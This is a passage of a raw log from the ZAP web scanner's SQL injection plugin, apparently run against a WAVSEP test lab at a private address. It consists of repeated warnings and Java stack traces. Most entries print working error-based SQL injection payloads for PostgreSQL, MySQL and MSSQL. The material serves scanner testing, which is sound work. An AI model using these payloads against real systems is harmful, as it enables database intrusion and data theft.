ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 5761=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5761=5761) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681236 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2884=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2884=2884) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('VzYF'='VzYF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 2884=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2884=2884) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('VzYF'='VzYF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681237 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT 1498 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1498=1498,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SnPM'='SnPM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT 1498 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1498=1498,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SnPM'='SnPM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681238 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2023=2023,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2023=2023,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681238 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 5349=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5349=5349) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'dNBo'='dNBo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 5349=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5349=5349) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'dNBo'='dNBo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681240 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 3173=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3173=3173) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 3173=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3173=3173) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681240 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 2157 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2157=2157,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DMYH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT 2157 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(2157=2157,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DMYH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681241 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2308=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2308=2308) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- rqqJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2308=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2308=2308) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- rqqJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681241 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 5189=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5189=5189) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8105=8105] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 5189=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5189=5189) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (8105=8105 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681242 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 2619=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2619=2619) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3292=3292] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 2619=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2619=2619) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (3292=3292 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681243 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 6429=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6429=6429) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 6429=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6429=6429) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681244 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3052=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3052=3052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 3052=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3052=3052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681245 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5357=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5357=5357) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('vOfd'='vOfd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 5357=CONVERT(INT,(SELECT 